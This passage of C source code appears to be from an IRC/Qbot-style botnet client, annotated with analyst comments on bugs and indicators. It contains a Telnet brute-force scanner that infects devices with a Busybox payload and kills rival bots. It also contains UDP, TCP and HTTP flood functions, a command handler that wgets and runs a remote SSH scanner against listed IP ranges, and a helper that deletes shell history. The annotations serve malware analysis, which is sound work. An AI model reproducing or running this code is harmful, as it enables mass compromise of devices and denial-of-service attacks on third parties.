  1262. fds[i].sockbuf = tmp;
  1263. 
  1264. 
  1265. fds[i].ip = MiraiIPRanges();
  1266. }
  // Credential failed: indices advance in lockstep (positional pairs).
  1267. else if(fds[i].complete == 0)
  1268. {
  1269. fds[i].usernameInd++;
  1270. fds[i].passwordInd++;
  1271. 
  // No `continue` here (unlike the username check and TelnetScanner): when
  // only the password table is exhausted, execution falls through to the
  // connect below with an out-of-range passwordInd.
  1272. if(fds[i].passwordInd == sizeof(Mirai_Passwords) / sizeof(char *))
  1273. {
  1274. fds[i].complete = 1;
  1275. }
  1276. if(fds[i].usernameInd == sizeof(Mirai_Usernames) / sizeof(char *))
  1277. {
  1278. fds[i].complete = 1;
  1279. continue;
  1280. }
  1281. }
  1282. dest_addr.sin_family = AF_INET;
  1283. dest_addr.sin_port = htons(23);
  1284. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1285. 
  1286. dest_addr.sin_addr.s_addr = fds[i].ip;
  1287. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  1288. if(fds[i].fd == -1) continue;
  1289. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  1290. 
  1291. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
  1292. {
  1293. reset_telstate(&fds[i]);
  1294. }
  1295. else
  1296. {
  1297. advance_telstate(&fds[i], 1);
  1298. }
  1299. }
  1300. break;
  1301. case 1:
  1302. {
  // Wait for the non-blocking connect; SO_ERROR tells success from refusal.
  1303. FD_ZERO(&fdset);
  1304. FD_SET(fds[i].fd, &fdset);
  1305. tv.tv_sec = 0;
  1306. tv.tv_usec = wait_usec;
  1307. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  1308. if(res == 1)
  1309. {
  // Stamps the clock directly here (TelnetScanner clears it to 0 instead).
  1310. fds[i].tTimeout = time(NULL);
  1311. lon = sizeof(int);
  1312. valopt = 0;
  1313. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  1314. if(valopt)
  1315. {
  1316. reset_telstate(&fds[i]);
  1317. }
  1318. else
  1319. {
  1320. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  1321. advance_telstate(&fds[i], 2);
  1322. }
  1323. continue;
  1324. }
  1325. else if(res == -1)
  1326. {
  1327. reset_telstate(&fds[i]);
  1328. continue;
  1329. }
  1330. if(fds[i].tTimeout + 7 < time(NULL))
  1331. {
  1332. reset_telstate(&fds[i]);
  1333. }
  1334. }
  1335. break;
  1336. case 2:
  1337. {
  // Login prompt; a failure string returns to state 0 for the next pair.
  1338. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  1339. {
  1340. fds[i].tTimeout = time(NULL);
  1341. if(contains_fail(fds[i].sockbuf))
  1342. {
  1343. advance_telstate(&fds[i], 0);
  1344. }
  1345. else
  1346. {
  1347. advance_telstate(&fds[i], 3);
  1348. }
  1349. continue;
  1350. }
  1351. if(fds[i].tTimeout + 7 < time(NULL))
  1352. {
  1353. reset_telstate(&fds[i]);
  1354. }
  1355. }
  1356. break;
  1357. case 3:
  1358. {
  1359. if(send(fds[i].fd, Mirai_Usernames[fds[i].usernameInd], strlen(Mirai_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
  1360. {
  1361. reset_telstate(&fds[i]);
  1362. continue;
  1363. }
  1364. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  1365. {
  1366. reset_telstate(&fds[i]);
  1367. continue;
  1368. }
  1369. advance_telstate(&fds[i], 4);
  1370. }
  1371. break;
  1372. case 4:
  1373. {
  1374. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  1375. {
  1376. fds[i].tTimeout = time(NULL);
  1377. if(contains_fail(fds[i].sockbuf))
  1378. {
  1379. advance_telstate(&fds[i], 0);
  1380. }
  1381. else
  1382. {
  1383. advance_telstate(&fds[i], 5);
  1384. }
  1385. continue;
  1386. }
  1387. if(fds[i].tTimeout + 7 < time(NULL))
  1388. {
  1389. reset_telstate(&fds[i]);
  1390. }
  1391. }
  1392. break;
  1393. case 5:
  1394. {
  // With the fall-through noted in state 0, passwordInd can equal the table
  // size here, reading one pointer past the end of Mirai_Passwords.
  1395. if(send(fds[i].fd, Mirai_Passwords[fds[i].passwordInd], strlen(Mirai_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
  1396. {
  1397. reset_telstate(&fds[i]);
  1398. continue;
  1399. }
  1400. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  1401. {
  1402. reset_telstate(&fds[i]);
  1403. continue;
  1404. }
  1405. advance_telstate(&fds[i], 6);
  1406. }
  1407. break;
  1408. case 6:
  1409. {
  // Login result; a hit is reported to the C2 with the victim IP and
  // credential pair. Nothing in this excerpt sets complete to 2.
  1410. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2)) //waiting for response.
  1411. {
  1412. fds[i].tTimeout = time(NULL);
  1413. if(contains_fail(fds[i].sockbuf))
  1414. {
  1415. advance_telstate(&fds[i], 0);
  1416. }
  1417. else if(contains_success(fds[i].sockbuf))
  1418. {
  1419. if(fds[i].complete == 2)
  1420. {
  1421. advance_telstate(&fds[i], 7);
  1422. }
  1423. else
  1424. {
  1425. sockprintf(mainCommSock, "[!] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  1426. advance_telstate(&fds[i], 7);
  1427. }
  1428. }
  1429. else
  1430. {
  1431. reset_telstate(&fds[i]);
  1432. }
  1433. continue;
  1434. }
  1435. if(fds[i].tTimeout + 7 < time(NULL))
  1436. {
  1437. reset_telstate(&fds[i]);
  1438. }
  1439. }
  1440. break;
  1441. case 7:
  1442. {
  1443. 
  // Competitor cleanup, identical to TelnetScanner: sprintf() into 80-byte
  // stack buffers bounded only by the globals' lengths; RemoveTempDirs()
  // also runs locally on the bot. The two C2 reports below index the
  // Telnet_* tables, not the Mirai_* ones used for the actual login.
  1444. char RemoveTheTempDirs [80];
  1445. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
  1446. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  1447. RemoveTempDirs();
  1448. sockprintf(mainCommSock, "[!] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1449. 
  1450. char killtheproccesses[80];
  1451. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
  1452. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  1453. sockprintf(mainCommSock, "[!] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1454. 
  1455. advance_telstate(&fds[i], 8);
  1456. }
  1457. break;
  1458. case 8:
  1459. {
  1460. 
  // Infection stage. tTimeout is re-stamped on every pass, so the 45 s
  // check below can only fire if read_until_response stalls that long; the
  // slot otherwise re-sends the payload each pass until a send() fails.
  1461. fds[i].tTimeout = time(NULL);
  1462. 
  // Empty-statement `if (...) < 0);` - results are ignored.
  1463. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
  1464. if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
  1465. 
  1466. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  1467. sockprintf(mainCommSock, "[!] Sending Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  1468. 
  1469. //int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
  // Waits for lower-case "connected" but tests the buffer case-insensitively
  // for "CONNECTED"; complete is never set to 3 here, so the success report
  // repeats on every pass that sees the marker.
  1470. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "connected"))
  1471. {
  1472. //char strcasestr (const char *big, const char *little)
  1473. if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
  1474. {
  1475. sockprintf(mainCommSock, "[!] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  1476. }
  1477. }
  1478. if(fds[i].tTimeout + 45 < time(NULL))
  1479. {
  1480. if(fds[i].complete!=3)
  1481. {
  1482. sockprintf(mainCommSock, "[!] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  1483. }
  1484. reset_telstate(&fds[i]);
  1485. }
  1486. break;
  1487. }
  1488. }
  1489. }
  1490. }
  1491. }
  1492.  
  /*
   * "STD" UDP flood: runs in a forked child (see the STD command handler
   * further down) and spins until `secs` have elapsed, sending one datagram
   * every 50 loop iterations, then _exit()s. Observations:
   *  - gethostbyname() is not NULL-checked; an unresolvable target crashes
   *    the child at the bcopy() below.
   *  - sin_port is assigned without htons(), so on little-endian hosts the
   *    datagrams go to a byte-swapped port, not the one requested.
   *  - send() is asked for 69 bytes from the 4-byte literal "std", so each
   *    datagram carries 65 bytes of whatever follows it in .rodata.
   *  - send() precedes the first connect(); the very first attempt fails on
   *    an unconnected UDP socket and only later ones have a destination.
   */
  1493. void SendSTD(unsigned char *ip, int port, int secs) {
  1494. int iSTD_Sock;
  1495. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
  1496. time_t start = time(NULL);
  1497. struct sockaddr_in sin;
  1498. struct hostent *hp;
  1499. hp = gethostbyname(ip);
  1500. bzero((char*) &sin,sizeof(sin));
  1501. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  1502. sin.sin_family = hp->h_addrtype;
  1503. sin.sin_port = port;
  1504. unsigned int a = 0;
  1505. while(1){
  1506. if (a >= 50) {
  1507. send(iSTD_Sock, "std", 69, 0);
  1508. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
  // Duration check only happens on the sending iterations.
  1509. if (time(NULL) >= start + secs) {
  1510. close(iSTD_Sock);
  1511. _exit(0);
  1512. }
  1513. a = 0;
  1514. }
  1515. a++;
  1516. }
  1517. }
  /*
   * Raw-socket UDP flood. Crafts IP+UDP datagrams with `packetsize` bytes of
   * random payload (makeRandomStr, defined elsewhere) and sends them to
   * target:port for `timeEnd` seconds, checking the clock every
   * `pollinterval` packets. port == 0 means a random destination port per
   * packet. spoofit selects how many leading source-address bits are kept
   * from ourIP (see getRandomIP); the command handler passes 32, so in
   * practice the source is the bot's real address.
   * Requirements/observations:
   *  - SOCK_RAW with IP_HDRINCL needs CAP_NET_RAW (root). The `!sockfd` test
   *    does not catch socket()'s -1 return; the failure surfaces via the
   *    setsockopt() check instead.
   *  - spoofit == 0 would shift by 32 bits (undefined); only 1..32 is sane.
   *  - getHost() resolves the target; its definition is outside this excerpt.
   *  - The socket is never closed; the calling child _exit()s afterwards.
   */
  1518. void SendUDP(unsigned char *target, int port, int timeEnd, int packetsize, int pollinterval, int spoofit) {
  1519. struct sockaddr_in dest_addr;
  1520. dest_addr.sin_family = AF_INET;
  1521. if(port == 0) dest_addr.sin_port = rand_cmwc();
  1522. else dest_addr.sin_port = htons(port);
  1523. if(getHost(target, &dest_addr.sin_addr)) return;
  1524. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1525. register unsigned int pollRegister;
  1526. pollRegister = pollinterval;
  1527. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
  1528. if(!sockfd) {
  1529. return;
  1530. }
  1531. int tmp = 1;
  1532. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
  1533. return;
  1534. }
  // Re-seeds libc rand() and the CMWC generator 50 times; cosmetic.
  1535. int counter = 50;
  1536. while(counter--) {
  1537. srand(time(NULL) ^ rand_cmwc());
  1538. init_rand(rand());
  1539. }
  1540. in_addr_t netmask;
  1541. netmask = ( ~((1 << (32 - spoofit)) - 1) );
  // VLA sized by the C2-supplied packetsize (capped at 1024 by the handler).
  1542. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
  1543. struct iphdr *iph = (struct iphdr *)packet;
  1544. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
  1545. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
  1546. udph->len = htons(sizeof(struct udphdr) + packetsize);
  1547. udph->source = rand_cmwc();
  1548. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  // UDP checksum left at zero (permitted for IPv4 = "not computed").
  1549. udph->check = 0;
  1550. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
  // tot_len is host-order here, so csum() runs over the entire datagram.
  1551. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1552. int end = time(NULL) + timeEnd;
  1553. register unsigned int i = 0;
  1554. while(1) {
  1555. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  // Payload stays constant; only ports, IP id and source address change.
  1556. udph->source = rand_cmwc();
  1557. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  1558. iph->id = rand_cmwc();
  1559. iph->saddr = htonl( getRandomIP(netmask) );
  1560. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1561. if(i == pollRegister) {
  1562. if(time(NULL) > end) break;
  1563. i = 0;
  1564. continue;
  1565. }
  1566. i++;
  1567. }
  1568. }
  /*
   * Raw-socket TCP flood. Builds one IP+TCP packet (doff = 5, no options,
   * `packetsize` bytes after the header that are never initialised) with the
   * requested flag set and re-sends it to target:port for `timeEnd` seconds,
   * re-randomising source address/port, IP id and sequence number per packet.
   * `flags` is either "all" (SYN+RST+FIN+ACK+PSH) or a comma list of
   * syn,rst,fin,ack,psh; unknown tokens are ignored. strtok() modifies the
   * caller's string in place.
   * Observations:
   *  - Needs CAP_NET_RAW; `!sockfd` misses socket()'s -1, the setsockopt()
   *    check catches it.
   *  - spoofit == 0 gives a fully random source; the command handler passes
   *    32, so the real address is used. 1 << (32 - spoofit) with spoofit == 0
   *    is avoided by the explicit branch.
   *  - tcpcsum() covers only the header, so packets with packetsize > 0 carry
   *    an incorrect TCP checksum (see tcpcsum notes).
   *  - The socket is never closed; the calling child _exit()s.
   */
  1569. void SendTCP(unsigned char *target, int port, int timeEnd, unsigned char *flags, int packetsize, int pollinterval, int spoofit) {
  1570. register unsigned int pollRegister;
  1571. pollRegister = pollinterval;
  1572. struct sockaddr_in dest_addr;
  1573. dest_addr.sin_family = AF_INET;
  1574. if(port == 0) dest_addr.sin_port = rand_cmwc();
  1575. else dest_addr.sin_port = htons(port);
  1576. if(getHost(target, &dest_addr.sin_addr)) return;
  1577. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1578. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
  1579. if(!sockfd) { return; }
  1580. int tmp = 1;
  1581. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { return; }
  1582. in_addr_t netmask;
  1583. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
  1584. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
  // VLA sized by the C2-supplied packetsize; the trailing bytes are sent
  // uninitialised (no makeRandomStr call in this function).
  1585. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
  1586. struct iphdr *iph = (struct iphdr *)packet;
  1587. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
  1588. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
  1589. tcph->source = rand_cmwc();
  1590. tcph->seq = rand_cmwc();
  1591. tcph->ack_seq = 0;
  1592. tcph->doff = 5;
  1593. if(!strcmp(flags, "all")) {
  1594. tcph->syn = 1;
  1595. tcph->rst = 1;
  1596. tcph->fin = 1;
  1597. tcph->ack = 1;
  1598. tcph->psh = 1;
  1599. } else {
  1600. unsigned char *pch = strtok(flags, ",");
  1601. while(pch) {
  1602. if(!strcmp(pch, "syn")) { tcph->syn = 1;
  1603. } else if(!strcmp(pch, "rst")) { tcph->rst = 1;
  1604. } else if(!strcmp(pch, "fin")) { tcph->fin = 1;
  1605. } else if(!strcmp(pch, "ack")) { tcph->ack = 1;
  1606. } else if(!strcmp(pch, "psh")) { tcph->psh = 1;
  1607. } else {
  1608. }
  1609. pch = strtok(NULL, ",");
  1610. }
  1611. }
  // Random window is a useful fingerprint: real stacks advertise a small
  // fixed set of initial windows.
  1612. tcph->window = rand_cmwc();
  1613. tcph->check = 0;
  1614. tcph->urg_ptr = 0;
  1615. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
  1616. tcph->check = tcpcsum(iph, tcph);
  1617. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1618. int end = time(NULL) + timeEnd;
  1619. register unsigned int i = 0;
  1620. while(1) {
  1621. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  // Destination port is fixed after setup (even for port == 0), unlike SendUDP.
  1622. iph->saddr = htonl( getRandomIP(netmask) );
  1623. iph->id = rand_cmwc();
  1624. tcph->seq = rand_cmwc();
  1625. tcph->source = rand_cmwc();
  1626. tcph->check = 0;
  1627. tcph->check = tcpcsum(iph, tcph);
  1628. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1629. if(i == pollRegister) {
  1630. if(time(NULL) > end) break;
  1631. i = 0;
  1632. continue;
  1633. }
  1634. i++;
  1635. }
  1636. }
  /*
   * Blocking TCP connect helper for SendHTTP. Returns the connected socket,
   * or 0 on any failure (0 is also a valid descriptor number, but stdin is
   * normally occupying it). Observations:
   *  - setsockopt() runs before the sock == -1 check.
   *  - On connect() failure the socket is NOT closed, so each failed attempt
   *    leaks a descriptor; in SendHTTP's retry loop this exhausts the fd
   *    table against a host that refuses connections.
   *  - addr is not zeroed; sin_zero is left uninitialised.
   */
  1637. int socket_connect(char *host, in_port_t port) {
  1638. struct hostent *hp;
  1639. struct sockaddr_in addr;
  1640. int on = 1, sock;
  1641. if ((hp = gethostbyname(host)) == NULL) return 0;
  1642. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
  1643. addr.sin_port = htons(port);
  1644. addr.sin_family = AF_INET;
  1645. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  1646. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
  1647. if (sock == -1) return 0;
  1648. if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
  1649. return sock;
  1650. }
  /*
   * HTTP request flood. Spawns `power` worker processes; each one opens a
   * new TCP connection per request, writes a single "<method> <path>
   * HTTP/1.1" request with a rotating User-Agent (useragents[], 36 entries
   * assumed, defined elsewhere), reads one byte, closes, and repeats until
   * `timeEnd` seconds elapse.
   * Observations:
   *  - The fork() test is inverted relative to the usual idiom: the PARENT
   *    (non-zero pid) runs the attack loop and exit()s, while the child
   *    continues the for loop and forks the next worker. The final child
   *    returns to the caller, which exit()s right after (HTTP handler).
   *  - request[512] is filled with sprintf() from C2-supplied method, path
   *    and host strings, so a long path overflows the stack buffer.
   *  - write()/read() results are ignored; sendIP is unused.
   *  - socket_connect() leaks a descriptor per failed connect (see above).
   */
  1651. void SendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
  1652. int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
  1653. char request[512], buffer[1];
  1654. for (i = 0; i < power; i++) {
  1655. sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, useragents[(rand() % 36)]);
  1656. if (fork()) {
  1657. while (end > time(NULL)) {
  1658. socket = socket_connect(host, port);
  1659. if (socket != 0) {
  1660. write(socket, request, strlen(request));
  1661. read(socket, buffer, 1);
  1662. close(socket);
  1663. }
  1664. }
  1665. exit(0);
  1666. }
  1667. }
  1668. }
  1669.  
  /*
   * Anti-forensics helper called after every PYTHON sub-command. Each
   * system() call runs in a fresh /bin/sh child, so `history -c;history -w`
   * only affects that child's (empty) history; the second call removes the
   * current user's ~/.bash_history. Deletion of ~/.bash_history on a host
   * that also spawns `python scan.py` is a strong IR indicator.
   */
  1670. void ClearHistory()
  1671. {
  1672. system("history -c;history -w");
  1673. system("cd /;rm -rf ~/.bash_history");
  1674. }
  1675.  
  /*
   * Unimplemented stub. The PYTHON LOAD handler further down passes this
   * function's name as a %s argument to sprintf(), i.e. it formats a
   * function pointer as a string rather than any range - the resulting
   * command line is garbage, not a random /16.
   */
  1676. void RandomPythonRange()
  1677. {
  1678. //GET TO THIS SHIT LATER.
  1679. }
  1680.  
  1681. void processCmd(int argc, unsigned char *argv[]) {
  1682. if(!strcmp(argv[0], "PING"))
  1683. {
  1684. return;
  1685. }
  1686. if(!strcmp(argv[0], "TELNET"))
  1687. {
  1688. if(!strcmp(argv[1], "ON"))
  1689. {
  1690. uint32_t parent;
  1691. parent = fork();
  1692. int ii = 0;
  1693. int forks = sysconf( _SC_NPROCESSORS_ONLN );
  1694. int fds = 999999;
  1695. if(forks == 1) fds = 500;
  1696. if(forks >= 2) fds = 1000;
  1697. if (parent > 0)
  1698. {
  1699. scanPid = parent;
  1700. return;
  1701. }
  1702. else if(parent == -1) return;
  1703.  
  1704. for (ii = 0; ii < forks; ii++)
  1705. {
  1706. srand((time(NULL) ^ getpid()) + getppid());
  1707. init_rand(time(NULL) ^ getpid());
  1708. TelnetScanner(100, fds);
  1709. _exit(0);
  1710. }
  1711. }
  1712. if(!strcmp(argv[1], "OFF"))
  1713. {
  1714. if(scanPid == 0) return;
  1715. kill(scanPid, 9);
  1716. scanPid = 0;
  1717. }
  1718. if(!strcmp(argv[1], "FASTLOAD"))
  1719. {
  1720. int threads = atoi(argv[1]);
  1721. int usec = atoi(argv[2]);
  1722. if(!listFork())
  1723. {
  1724. sockprintf(mainCommSock, "[TELNET] Starting Fastload.");
  1725. TelnetScanner(usec, threads);
  1726. _exit(0);
  1727. }
  1728. return;
  1729. }
  1730. }
  1731. if(!strcmp(argv[0], "MIRAI"))
  1732. {
  1733. if(!strcmp(argv[1], "ON"))
  1734. {
  1735.  
  1736. uint32_t parent;
  1737. parent = fork();
  1738. int ii = 0;
  1739. int forks = sysconf( _SC_NPROCESSORS_ONLN );
  1740. int fds = 999999;
  1741. if(forks == 1) fds = 500;
  1742. if(forks >= 2) fds = 1000;
  1743. if (parent > 0)
  1744. {
  1745. scanPid = parent;
  1746. return;
  1747. }
  1748. else if(parent == -1) return;
  1749.  
  1750. for (ii = 0; ii < forks; ii++)
  1751. {
  1752. srand((time(NULL) ^ getpid()) + getppid());
  1753. init_rand(time(NULL) ^ getpid());
  1754. MiraiScanner(100, fds);
  1755. _exit(0);
  1756. }
  1757. }
  1758. if(!strcmp(argv[1], "OFF"))
  1759. {
  1760. if(scanPid == 0) return;
  1761.  
  1762. kill(scanPid, 9);
  1763. scanPid = 0;
  1764. }
  1765. if(!strcmp(argv[1], "FASTLOAD"))
  1766. {
  1767. int threads = atoi(argv[1]);
  1768. int usec = atoi(argv[2]);
  1769. if(!listFork())
  1770. {
  1771. sockprintf(mainCommSock, "Starting scanner!!");
  1772. MiraiScanner(usec, threads);
  1773. _exit(0);
  1774. }
  1775. return;
  1776. }
  1777. }
  1778.  
  1779. if(!strcmp(argv[0], "PYTHON")) //Infect a Scanner server to the net, before executing this.
  1780. {
  1781. char SendPythonCommand[80];
  1782.  
  1783. if(!strcmp(argv[1], "INSTALL"))
  1784. {
  1785. system("sudo yum install python-paramiko -y;sudo apt-get install python-paramiko -y;");
  1786. sockprintf(mainCommSock, "[PYTHON] Installing Dependencies.");
  1787.  
  1788. char MakePythonDirectory[80];
  1789. sprintf(MakePythonDirectory, "sudo mkdir %s;", Python_Temp_Directory);
  1790. system(MakePythonDirectory);
  1791. sockprintf(mainCommSock, "[PYTHON] Making Directorys.");
  1792.  
  1793.  
  1794. char WgetPythonPayload[80];
  1795. sprintf(WgetPythonPayload, "cd %s;wget %s;", Python_Temp_Directory, Python_File_Location);
  1796. system(WgetPythonPayload);
  1797. sockprintf(mainCommSock, "[PYTHON] Downloading Scanner.");
  1798.  
  1799. ClearHistory();
  1800.  
  1801. sockprintf(mainCommSock, "[PYTHON] Done with installation.");
  1802. }
  1803. if(!strcmp(argv[1], "UPDATE"))
  1804. {
  1805. char ClearPythonDirectory[80];
  1806. sprintf(ClearPythonDirectory, "cd %s;rm -rf scan.py", Python_Temp_Directory);
  1807. system(ClearPythonDirectory);
  1808. sockprintf(mainCommSock, "[PYTHON] Finishied Removing Existing Scanner.");
  1809. ClearHistory();
  1810.  
  1811. sockprintf(mainCommSock, "[PYTHON] Done Updating Scanner.");
  1812. }
  1813. if(!strcmp(argv[1], "OFF"))
  1814. {
  1815. system("killall -9 python;pkill -9 python");
  1816. ClearHistory();
  1817. sockprintf(mainCommSock, "[PYTHON] Killing Python Scanning Process.");
  1818. }
  1819. if(!strcmp(argv[1], "1"))
  1820. {
  1821. char idefk[80];
  1822. sprintf(idefk, "cd %s;python scan.py 376 B 119.93 lol", Python_Temp_Directory);
  1823. system(idefk);
  1824. ClearHistory();
  1825. sockprintf(mainCommSock, "[PYTHON] Range: 119.93.x.x || Port 22");
  1826. }
  1827. if(!strcmp(argv[1], "2"))
  1828. {
  1829.  
  1830. char idefk[80];
  1831. sprintf(idefk, "cd %s;python scan.py 376 B 91.98 2", Python_Temp_Directory);
  1832. system(idefk);
  1833. ClearHistory();
  1834. sockprintf(mainCommSock, "[PYTHON] Range: 91.98.x.x || Port: 22");
  1835. }
  1836. if(!strcmp(argv[1], "3"))
  1837. {
  1838. char idefk[80];
  1839. sprintf(idefk, "cd %s;python scan.py 376 B 118.173 2", Python_Temp_Directory);
  1840. system(idefk);
  1841. ClearHistory();
  1842. sockprintf(mainCommSock, "[PYTHON] Range: 118.173.x.x || Port: 22");
  1843. }
  1844. if(!strcmp(argv[1], "4"))
  1845. {
  1846. char idefk[80];
  1847. sprintf(idefk, "cd %s;python scan.py 376 B 91.99 2", Python_Temp_Directory);
  1848. system(idefk);
  1849. ClearHistory();
  1850. sockprintf(mainCommSock, "[PYTHON] Range: 91.99.x.x || Port: 22");
  1851. }
  1852. if(!strcmp(argv[1], "5"))
  1853. {
  1854. char idefk[80];
  1855. sprintf(idefk, "cd %s;python scan.py 376 B 92.99 2", Python_Temp_Directory);
  1856. system(idefk);
  1857. ClearHistory();
  1858. sockprintf(mainCommSock, "[PYTHON] Range: 92.99.x.x || Port: 22");
  1859. }
  1860. if(!strcmp(argv[1], "LOAD"))
  1861. {
  1862. char idefk[80];
  1863. sprintf(idefk, "cd %s;python scan.py 376 B %s 2", Python_Temp_Directory, RandomPythonRange);
  1864. system(idefk);
  1865. ClearHistory();
  1866. sockprintf(mainCommSock, "[PYTHON] Range: Random || Port: 22");
  1867. }
  1868. }
  1869. if (!strcmp(argv[0], "HTTP"))
  1870. {
  1871. // !* HTTP METHOD TARGET PORT PATH TIME POWER
  1872. // !* HTTP POST/GET/HEAD hackforums.net 80 / 10 100
  1873. if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
  1874. if (listFork()) return;
  1875. SendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
  1876. exit(0);
  1877. }
  1878. if(!strcmp(argv[0], "UDP"))
  1879. {
  1880. // !* UDP TARGET PORT TIME PACKETSIZE POLLINTERVAL
  1881. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 1024 || (argc == 6 && atoi(argv[5]) < 1))
  1882. {
  1883. return;
  1884. }
  1885. unsigned char *ip = argv[1];
  1886. int port = atoi(argv[2]);
  1887. int time = atoi(argv[3]);
  1888. int packetsize = atoi(argv[4]);
  1889. int pollinterval = (argc == 6 ? atoi(argv[5]) : 10);
  1890. int spoofed = 32;
  1891. if(strstr(ip, ",") != NULL)
  1892. {
  1893. unsigned char *hi = strtok(ip, ",");
  1894. while(hi != NULL)
  1895. {
  1896. if(!listFork())
  1897. {
  1898. SendUDP(hi, port, time, packetsize, pollinterval, spoofed);
  1899. _exit(0);
  1900. }
  1901. hi = strtok(NULL, ",");
  1902. }
  1903. } else {
  1904. if (listFork())
  1905. {
  1906. return;
  1907. }
  1908. SendUDP(ip, port, time, packetsize, pollinterval, spoofed);
  1909. _exit(0);
  1910. }
  1911. }
